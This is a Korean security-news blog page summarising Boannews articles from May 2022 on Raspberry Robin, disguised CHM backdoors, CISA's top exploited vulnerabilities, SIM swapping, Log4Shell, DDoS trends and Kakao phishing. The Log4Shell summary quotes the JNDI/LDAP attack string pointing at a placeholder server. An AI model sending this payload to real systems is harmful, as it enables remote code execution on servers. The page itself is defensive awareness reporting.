밍구의 Tstory

🔽기사 전문 http://www.boannews.com/media/view.asp?idx=106578 윈도 인스톨러 통해 퍼지는 새로운 웜, 라즈베리 로빈 발견돼 보안 외신 블리핑컴퓨터에 의하면 새로운 윈도 멀웨어가 최근 발표되었다고 한다. 이 멀웨어의 이름은 라즈베리 로빈(Raspberry Robin)으로, 웜 기능을 가지고 있어 자가 증식이 가능하며 특히 USB 드 www.boannews.com [요약] 2021년 9월부터 라즈베리 로빈이라는 새 멀웨어 등장. 웜 기능을 가지고 있어 자가증식 가능. 특히 usb 드라이브를 통해 퍼지는 능력 탁월 msiexec.exe라는 프로세스를 사용해 외부 네트워크와 교신 시도. 이를 통해 정상적인 인스톨러 패키지를 다운 받아 실행. 그러고 악성 dll파일을 시스템..

IT 보안/보안최신동향 2022. 5. 8. 23:18

🔽기사 전문 http://www.boannews.com/media/view.asp?idx=106551 문서 편집·메신저 프로그램 위장 악성파일, 국가기관 관리자·교수 타깃 유포 문서 편집 및 메신저 프로그램으로 위장해 정보를 유출하는 백도어가 발견됐다. 특히, 국가기관 관리자와 대학교수 등을 타깃으로 유포돼 관계자들의 각별한 주의가 요구된다. www.boannews.com [요약] 문서 편집 및 메신저 프로그램으로 위장해 정보를 유출하는 백도어가 국가기관 관리자와 대학교수 등을 타깃으로 유포됨. 백도어 파일명은 △국가융합망 예버서버 점검.chm △***** 전자출결-웹페이지 교수자-메뉴얼 Ver1.0.chm △붙임1. 전임교원 책임시간 확인 프로그램 사용 방법 Ver 1.0(국문).chm chm 파일에 ..

IT 보안/보안최신동향 2022. 5. 8. 23:12

🔽기사 전문 http://www.boannews.com/media/view.asp?idx=106528 2021년 가장 많이 악용된 취약점 15개? 최악은 ‘로그4셸’과 ‘MS익스체인지’ 미국의 사이버보안 전담기관인 CISA(Cybersecurity and Infrastructure Security Agency)가 2021년에 가장 많이 악용된 취약점 15개를 공개했다. 사이버 공격자들은 2021년에는 특히 새로 공개된 취약점을 악용해 www.boannews.com [요약] CVE-2021-44228 : 일명 Log4j, 시스템 완전 제어, 정보탈취, 랜섬웨어 실행 가능. 한 업체가 검색 엔진으로 스캔을 실시한 결과 취약버전 Log4j를 인터넷에 그대로 노출시키고 있는 서버가 9만개 이상. 여전히 취약서버..

IT 보안/보안최신동향 2022. 5. 8. 22:41

🔽기사 전문 http://www.boannews.com/media/view.asp?idx=106573 국내 첫 심스와핑 사건 그 후, 유심 ‘기지국 정보’ 놓고 피해자 vs KT 지난 2022년 1월 5일, 가 단독 보도한 ‘[단독] KT 고객 유심 복사로 암호화폐 탈취? 국내 첫 심스와핑 의심 피해 발생’ 기사 이후, 국내 첫 심스와핑 사례로 의심되는 이번 범죄가 여러 www.boannews.com [요약] 심스와핑 사건의 첫 번째 쟁점은 '심스와핑 범죄인가 아닌가'이다. 사용자의 기기 변경이 아닌 심스와핑 범죄로 인정 받기 위해서는 두 번째 쟁점인 '기지국 정보'를 알아야 한다. 하지만 KT는 타인의 개인정보가 포함되어 있다며 기지국 정보를 알려주지 않았다. 이에 대해 두번째 피해자와 다섯 번째 피해..

IT 보안/보안최신동향 2022. 5. 8. 22:15

🔽기사 전문 http://www.boannews.com/media/view.asp?idx=106569 로그4셸 공격 건수 분석해보니... Log4j 취약점 공격은 현재진행형! 지난해 발견돼 역대 최악의 취약점으로 불리는 Log4j 취약점, 일명 로그4셸을 악용한 사이버공격이 지속적으로 포착돼 이용자들의 각별한 주의가 필요하다. Log4j는 JAVA를 기반으로 서버와 응용프 www.boannews.com [요약] CVE-2021-44228인 Log4j 취약점. 발견된 12월에 최고점을 찍었지만 2월 8일 200여 건 발생 등 여전히 공격 존재 공격에 주로 사용되는 코드는 ‘${jndi:ldap://server_ip:****/exploit}’, 우회를 위해 다양하게 변화됨 공격 형태가 매우 다양하므로 우회 ..

IT 보안/보안최신동향 2022. 5. 8. 22:06

🔽기사 전문 http://www.boannews.com/media/view.asp?idx=106349 러시아-우크라이나 전쟁 때문에 늘어난 디도스 공격, 1사분기에만 역대 최고 2022년 1사분기에는 디도스 공격이 지난 분기보다 무려 46%나 증가했다. 이는 러시아가 우크라이나를 침공하면서 핵티비스트들의 활동이 전 세계적으로 크게 증가한 것에 기인한다고 분석된다. www.boannews.com [요약] 2022년 1사분기 디도스 공격이 지난 분기보다 46%나 증가. 러시아의 우크라이나 침곡에 대한 핵티비스트들의 활동 증가가 원인으로 분석됨. 표적형 공격이 많았다는 점을 핵티비스트들의 활동과 연결 지을 수 있음. 디도스 공격의 지속 시간이 매우 길었다는 점도 핵티비스트와 연결지을 수 있음. 금전적 이득을 ..

IT 보안/보안최신동향 2022. 5. 1. 23:50

🔽기사 전문 http://www.boannews.com/media/view.asp?idx=106447 카카오톡 이용자보호조치 안내? 깜빡 속았다간 카카오 계정 탈취 최근 카카오 고객센터를 사칭한 피싱 메일이 또 다시 대량으로 유포중에 있어 사용자들의 주의가 필요하다. 피싱 메일은 ‘[kakao] 카카오톡 이용자보호조치 안내’라는 제목으로 유포 중이며, www.boannews.com [요약] [kakao] 카카오톡 이용자보호조치 안내’라는 제목으로, 실제 카카오톡 고객센터에서 보낸 이메일처럼 위장된 피싱 메일이 대량 유포 피싱 메일에서 안내된 방법대로 대화를 시도하면 링크를 전달받음 → 해당 링크를 열면 kakao 고객센터를 사칭한 페이지에서 개인정보 입력 요구 → 입력 후 작성을 누르면 입력된 정보가 공..

IT 보안/보안최신동향 2022. 5. 1. 23:38